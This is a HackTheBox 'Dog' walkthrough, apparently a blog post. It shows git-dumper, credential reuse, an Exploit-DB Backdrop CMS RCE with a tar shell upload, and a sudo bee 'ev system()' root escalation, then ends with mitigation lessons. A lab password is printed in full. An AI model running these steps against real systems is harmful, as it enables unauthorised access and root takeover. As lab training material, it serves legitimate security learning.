Post

HTB Dog Writeup

Posted Updated
Preview Image
By Iven
3 min read
HTB Dog Writeup

INFO

Machine IP = 10.10.11.58
OS = Linux
Level = EASY
Points = 20

Let’s start by adding the machine to our hosts file:

1

echo "10.10.11.58 dog.htb" >> /etc/hosts

Enumeration

Port Scanning

1

nmap -sC -sV -oA initial_scan 10.10.11.58

Open Ports:

  • 22/tcp: OpenSSH
  • 80/tcp: Apache 2.4.41 (HTTP)

Directory Enumeration (gobuster)

1

gobuster dir -u http://10.10.11.58 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Key Directories:

  • /files
  • /themes
  • /modules
  • /sites
  • /core
  • /layouts

Initial Access

Exposed Git Repository

Discovered an exposed .git directory. Dumped it using git-dumper:

1

git-dumper http://10.10.10.105/.git/ ./dog_git_repo

Database Credentials

In settings.php, found credentials for the Backdrop CMS database:

1

$database = 'mysql://root:[email protected]/backdrop';

CMS Authentication

Identified valid credentials via Git logs:

1
2
3
4
5

grep -r dog.htb

.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]> 1738963331 +0000    commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]> 1738963331 +0000       commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "[email protected]"

Used these to log into the Backdrop CMS dashboard.

Exploitation

Backdrop CMS 1.27.1 RCE

Exploit Used: Authenticated RCE via Project Installer (Exploit-DB 52021)

  • Generate Payload: 
    1
2

    searchsploit -m php/webapps/52021.py
python3 52021.py http://dog.htb
  • Bypass ZIP Restriction: 
    1

    tar -cvf shell.tar shell/  # Server blocked ZIP uploads
  • Upload shell.tar via CMS and trigger execution to gain a reverse shell.

In shell I excuted this command:

1

cat /etc/passwd | grep bash

1
2
3

root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash

By connect to SSH with the username johncusackand password found initially.

1
2

ssh [email protected]
this password -> BackDropJ2024DS2024

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Tue 18 Mar 2025 11:52:54 PM UTC

  System load:  0.15              Processes:             228
  Usage of /:   49.5% of 6.32GB   Users logged in:       0
  Memory usage: 19%               IPv4 address for eth0: 10.10.11.58
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

johncusack@dog:~$ cat user.txt

Privilege Escalation

Privilege Escalation via bee CLI Tool: Detailed Explanation

After gaining SSH access as johncusack, the sudo -l command reveals the following:

1
2
3
4
5
6
7

johncusack@dog:~$ sudo -l
[sudo] password for johncusack: 
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

This means johncusack can run /usr/local/bin/bee with root privileges without a password.

What is bee?

bee is a CLI tool bundled with Backdrop CMS (similar to drush for Drupal). It allows administrators to:

  • Manage the CMS (e.g., clear caches, run updates).

  • Execute arbitrary PHP code on the server.

  • Navigate to the Web Root: 
    1

    johncusack@dog:~$ cd /var/www/html/
  • Execute Arbitrary PHP Code as Root: 
    1

    johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee ev "system('cat /root/root.txt')"
  • bee ev: Evaluates the PHP code provided.
  • system(‘cat /root/root.txt’): Executes the shell command cat /root/root.txt via PHP’s syste () function.
  • Since this runs with sudo, the command is executed as root, bypassing file permissions.

Flags

  • User Flag: f8003…6159 (Located at /home/johncusack/user.txt)
  • Root Flag: b0019…c80f (Retrieved via sudo exploitation)

Mitigation Lessons:

This machine highlights the risks of exposed .git repositories and outdated CMS versions.

  • Restrict Sudo Permissions: Avoid granting wildcard sudo access (ALL : ALL) to CLI tools that execute code.
  • Sandbox CMS Tools: Limit tools like bee to non-root users or restrict their functionality.
  • Audit S-udoers: Regularly review /etc/sudoers to identify overly permissive rules.
  • Patch Management: Update CMS components to mitigate RCE vulnerabilities.
  • Credential Leaks: Always secure configuration files.

Done!

Hi there 👋 Support me!

Life is an echo—what you send out comes back.

Donate

HackTheBox, Writeup, Easy
Writeup HTB-Easy
This post is licensed under CC BY 4.0 by the author.